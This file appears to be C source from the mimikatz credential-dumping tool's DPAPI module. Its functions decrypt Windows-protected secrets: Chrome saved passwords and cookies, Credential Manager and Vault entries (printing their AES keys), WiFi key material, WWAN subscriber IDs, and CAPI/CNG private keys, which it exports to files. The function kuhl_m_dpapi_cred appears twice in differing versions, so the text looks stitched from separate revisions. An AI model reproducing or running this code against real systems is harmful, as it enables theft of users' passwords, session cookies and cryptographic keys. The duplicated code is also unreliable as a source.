NTSTATUS kuhl_m_dpapi_keys_cng(int argc, wchar_t * argv[]) { PBYTE file; PVOID out; DWORD szFile, outLen, cbProperties; PKULL_M_KEY_CNG_BLOB cngKey; PKULL_M_KEY_CNG_PROPERTY * properties; LPCWSTR infile; PWSTR name; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile)) { if(cngKey = kull_m_key_cng_create(file)) { kull_m_key_cng_descr(0, cngKey); if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateProperties, cngKey->dwPrivatePropertiesLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES), &out, &outLen, L"Decrypting Private Properties:\n")) { if(kull_m_key_cng_properties_create(out, outLen, &properties, &cbProperties)) { kull_m_key_cng_properties_descr(0, properties, cbProperties); kull_m_key_cng_properties_delete(properties, cbProperties); } LocalFree(out); } if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateKey, cngKey->dwPrivateKeyLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB), &out, &outLen, L"Decrypting Private Key:\n")) { kull_m_string_wprintf_hex(out, outLen, 0);kprintf(L"\n"); if(name = (PWSTR) LocalAlloc(LPTR, cngKey->dwNameLen + sizeof(wchar_t))) { RtlCopyMemory(name, cngKey->pName, cngKey->dwNameLen); kuhl_m_crypto_exportRawKeyToFile(out, outLen, TRUE, L"raw", 0, name, TRUE, TRUE); LocalFree(name); } LocalFree(out); } kull_m_key_cng_delete(cngKey); } LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input CNG private key file needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[]) { PCWSTR infile; PVOID file, out; DWORD szFile, szOut; PKULL_M_CRED_BLOB cred; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile)) { kull_m_dpapi_blob_quick_descr(0, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Credential:\n")) { if(cred = kull_m_cred_create(out)) { kull_m_cred_descr(0, cred); kull_m_cred_delete(cred); } LocalFree(out); } LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input CRED file needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[]) { PBYTE pFile, hex, dataOut; DWORD dwData, lenHex, lenDataOut; LPWSTR dataU, dataF; LPCWSTR infile; PKULL_M_DPAPI_BLOB blob; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, &pFile, &dwData)) { if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile)) { if(kull_m_string_quickxml_simplefind(dataU, L"Name", &dataF)) { kprintf(L"Profile \'%s\'\n\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"AccessString", &dataF)) { kprintf(L" * AccessString : %s\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"SubscriberID", &dataF)) { if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex)) { if(blob = kull_m_dpapi_blob_create(hex)) { kprintf(L"\n"); kull_m_dpapi_blob_descr(0, blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL)) { kprintf(L" * SubscriberID : "); kull_m_string_wprintf_hex(dataOut, lenDataOut, 0); kprintf(L"\n"); kprintf(L"%.*s", lenDataOut / sizeof(wchar_t), dataOut); LocalFree(dataOut); } kull_m_dpapi_blob_delete(blob); } LocalFree(hex); } LocalFree(dataF); } LocalFree(dataU); } LocalFree(pFile); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input Wwan XML profile needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[]) { PCWSTR infile; PVOID file, out; DWORD szFile, szOut; BOOL isNT5Cred; PKULL_M_CRED_BLOB cred; PKULL_M_CRED_LEGACY_CREDS_BLOB legacyCreds; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile)) { isNT5Cred = RtlEqualGuid((PBYTE) file + sizeof(DWORD), &KULL_M_DPAPI_GUID_PROVIDER); kull_m_dpapi_blob_quick_descr(0, isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, isNT5Cred ? szFile : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, isNT5Cred ? L"Decrypting Legacy Credential(s):\n" : L"Decrypting Credential:\n")) { if(isNT5Cred) { if(legacyCreds = kull_m_cred_legacy_creds_create(out)) { kull_m_cred_legacy_creds_descr(0, legacyCreds); kull_m_cred_legacy_creds_delete(legacyCreds); } } else { if(cred = kull_m_cred_create(out)) { kull_m_cred_descr(0, cred); kull_m_cred_delete(cred); } } LocalFree(out); } LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input CRED file needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_vault(int argc, wchar_t * argv[]) { PCWSTR inFilePolicy, inFileCred; PVOID filePolicy, fileCred, out; DWORD szFilePolicy, szFileCred, szOut, len, i, mode = CRYPT_MODE_CBC; BYTE aes128[AES_128_KEY_SIZE], aes256[AES_256_KEY_SIZE]; PKULL_M_CRED_VAULT_POLICY vaultPolicy; PKULL_M_CRED_VAULT_CREDENTIAL vaultCredential; PKULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE attribute; PKULL_M_CRED_VAULT_CLEAR clear; PVOID buffer; BOOL isAttr; HCRYPTPROV hProv; HCRYPTKEY hKey; if(kull_m_string_args_byName(argc, argv, L"cred", &inFileCred, NULL)) { if(kull_m_file_readData(inFileCred, (PBYTE *) &fileCred, &szFileCred)) { if(vaultCredential = kull_m_cred_vault_credential_create(fileCred)) { kull_m_cred_vault_credential_descr(0, vaultCredential); if(kull_m_string_args_byName(argc, argv, L"policy", &inFilePolicy, NULL)) { if(kull_m_file_readData(inFilePolicy, (PBYTE *) &filePolicy, &szFilePolicy)) { if(vaultPolicy = kull_m_cred_vault_policy_create(filePolicy)) { kull_m_cred_vault_policy_descr(0, vaultPolicy); if(kuhl_m_dpapi_unprotect_raw_or_blob(vaultPolicy->key->KeyBlob, vaultPolicy->key->dwKeyBlob, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Policy Keys:\n")) { if(kull_m_cred_vault_policy_key(out, szOut, aes128, aes256)) { kprintf(L" AES128 key: "); kull_m_string_wprintf_hex(aes128, AES_128_KEY_SIZE, 0); kprintf(L"\n"); kprintf(L" AES256 key: "); kull_m_string_wprintf_hex(aes256, AES_256_KEY_SIZE, 0); kprintf(L"\n\n"); if(CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) { for(i = 0; i < vaultCredential->__cbElements; i++) { if(attribute = vaultCredential->attributes[i]) { kprintf(L" > Attribute %u : ", attribute->id); if(attribute->data && (len = attribute->szData)) { if(buffer = LocalAlloc(LPTR, len)) { RtlCopyMemory(buffer, attribute->data, len); if(kuhl_m_dpapi_vault_key_type(attribute, hProv, aes128, aes256, &hKey, &isAttr)) { if(CryptDecrypt(hKey, 0, TRUE, 0, (PBYTE) buffer, &len)) { if(isAttr) { kull_m_string_wprintf_hex(buffer, len, 0); } else { kprintf(L"\n"); if(!attribute->id || (attribute->id == 100)) { if(clear = kull_m_cred_vault_clear_create(buffer)) { kull_m_cred_vault_clear_descr(1, clear); kull_m_cred_vault_clear_delete(clear); } } else kull_m_string_wprintf_hex(buffer, len, 1 | (16 << 16)); kprintf(L"\n"); } } else PRINT_ERROR_AUTO(L"CryptDecrypt"); } LocalFree(buffer); } } kprintf(L"\n"); } } CryptReleaseContext(hProv, 0); } } LocalFree(out); } kull_m_cred_vault_policy_delete(vaultPolicy); } LocalFree(filePolicy); } else PRINT_ERROR_AUTO(L"kull_m_file_readData (policy)"); } kull_m_cred_vault_credential_delete(vaultCredential); } LocalFree(fileCred); } else PRINT_ERROR_AUTO(L"kull_m_file_readData (cred)"); } else PRINT_ERROR(L"Input Cred file needed (/cred:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[]) { PCWSTR infile; PSTR aInfile; int rc; sqlite3 *pDb; sqlite3_stmt * pStmt; LPVOID pDataOut; DWORD dwDataOutLen; __int64 i64; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(aInfile = kull_m_string_unicode_to_ansi(infile)) { rc = sqlite3_initialize(); if(rc == SQLITE_OK) { rc = sqlite3_open_v2(aInfile, &pDb, SQLITE_OPEN_READONLY, NULL); if(rc == SQLITE_OK) { if(kuhl_m_dpapi_chrome_isTableExist(pDb, "logins")) { rc = sqlite3_prepare_v2(pDb, "select signon_realm, origin_url, username_value, password_value from logins", -1, &pStmt, NULL); if(rc == SQLITE_OK) { while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW) { kprintf(L"\nURL : %.*S ( %.*S )\nUsername: %.*S\n", sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0), sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1), sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2)); if(kuhl_m_dpapi_unprotect_raw_or_blob(sqlite3_column_blob(pStmt, 3), sqlite3_column_bytes(pStmt, 3), NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL)) { kprintf(L"Password: %.*S\n", dwDataOutLen, pDataOut); LocalFree(pDataOut); } } if(rc != SQLITE_DONE) PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb)); } else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb)); sqlite3_finalize(pStmt); } else if(kuhl_m_dpapi_chrome_isTableExist(pDb, "cookies")) { rc = sqlite3_prepare_v2(pDb, "select host_key, path, name, creation_utc, expires_utc, encrypted_value from cookies order by host_key, path, name", -1, &pStmt, NULL); if(rc == SQLITE_OK) { while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW) { kprintf(L"\nHost : %.*S ( %.*S )\nName : %.*S\nDates : ", sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0), sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1), sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2)); i64 = sqlite3_column_int64(pStmt, 3) * 10; kull_m_string_displayLocalFileTime((LPFILETIME) &i64); i64 = sqlite3_column_int64(pStmt, 4) * 10; if(i64) { kprintf(L" -> "); kull_m_string_displayLocalFileTime((LPFILETIME) &i64); } kprintf(L"\n"); if(kuhl_m_dpapi_unprotect_raw_or_blob(sqlite3_column_blob(pStmt, 5), sqlite3_column_bytes(pStmt, 5), NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL)) { kprintf(L"Cookie: %.*S\n", dwDataOutLen, pDataOut); LocalFree(pDataOut); } } if(rc != SQLITE_DONE) PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb)); } else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb)); sqlite3_finalize(pStmt); } else PRINT_ERROR(L"Neither the table \'logins\' or the table \'cookies\' exist!\n"); } else PRINT_ERROR(L"sqlite3_open_v2: %S (%S)\n", sqlite3_errmsg(pDb), aInfile); rc = sqlite3_close_v2(pDb); rc = sqlite3_shutdown(); } else PRINT_ERROR(L"sqlite3_initialize: 0x%08x\n", rc); LocalFree(aInfile); } } else PRINT_ERROR(L"Input \'Login Data\' file needed (/in:\"%%localappdata%%\\Google\\Chrome\\User Data\\Default\\Login Data\")\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[]) { PBYTE pFile, hex, dataOut; DWORD dwData, lenHex, lenDataOut; LPWSTR dataU, dataSSID, dataF, dataAuth; LPCWSTR infile; PKULL_M_DPAPI_BLOB blob; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, &pFile, &dwData)) { if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile)) { if(kull_m_string_quickxml_simplefind(dataU, L"name", &dataF)) { kprintf(L"Profile \'%s\'\n\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"SSID", &dataSSID)) { kprintf(L" * SSID "); if(kull_m_string_quickxml_simplefind(dataSSID, L"name", &dataF)) { kprintf(L"name : %s\n", dataF); LocalFree(dataF); } else if(kull_m_string_quickxml_simplefind(dataSSID, L"hex", &dataF)) { kprintf(L"hex : %s\n", dataF); LocalFree(dataF); } else kprintf(L"?\n"); LocalFree(dataSSID); } if(kull_m_string_quickxml_simplefind(dataU, L"authentication", &dataAuth)) { kprintf(L" * Authentication: %s\n", dataAuth); if(kull_m_string_quickxml_simplefind(dataU, L"encryption", &dataF)) { kprintf(L" * Encryption : %s\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"keyMaterial", &dataF)) { if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex)) { if(blob = kull_m_dpapi_blob_create(hex)) { kprintf(L"\n"); kull_m_dpapi_blob_descr(0, blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL)) { kprintf(L" * Key Material : "); if(_wcsicmp(dataAuth, L"WEP") == 0) { kprintf(L"(hex) "); kull_m_string_wprintf_hex(dataOut, lenDataOut, 0); } else kprintf(L"%.*S", lenDataOut, dataOut); kprintf(L"\n"); LocalFree(dataOut); } kull_m_dpapi_blob_delete(blob); } LocalFree(hex); } LocalFree(dataF); } LocalFree(dataAuth); } LocalFree(dataU); } LocalFree(pFile); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input Wlan XML profile needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_keys_capi(int argc, wchar_t * argv[]) { PVOID file, out; PRSA_GENERICKEY_BLOB blob; DWORD szFile, outLen, szBlob; PKULL_M_KEY_CAPI_BLOB capiKey; LPCWSTR infile; PWSTR name; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile)) { if(capiKey = kull_m_key_capi_create(file)) { kull_m_key_capi_descr(0, capiKey); if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiExportFlag, capiKey->dwSiExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_SIGNATURE Export flags:\n")) { kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n"); LocalFree(out); } if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiPrivateKey, capiKey->dwSiPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_SIGNATURE Private Key:\n")) { kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n"); if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob)) { if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName)) { kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_signature", 0, name, TRUE, TRUE); LocalFree(name); } LocalFree(blob); } LocalFree(out); } if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExExportFlag, capiKey->dwExExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_EXCHANGE Export flags:\n")) { kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n"); LocalFree(out); } if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExPrivateKey, capiKey->dwExPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_EXCHANGE Private Key:\n")) { kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n"); if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob)) { if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName)) { kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_exchange", 0, name, TRUE, TRUE); LocalFree(name); } LocalFree(blob); } LocalFree(out); } kull_m_key_capi_delete(capiKey); } LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input CAPI private key file needed (/in:file)\n"); return STATUS_SUCCESS; }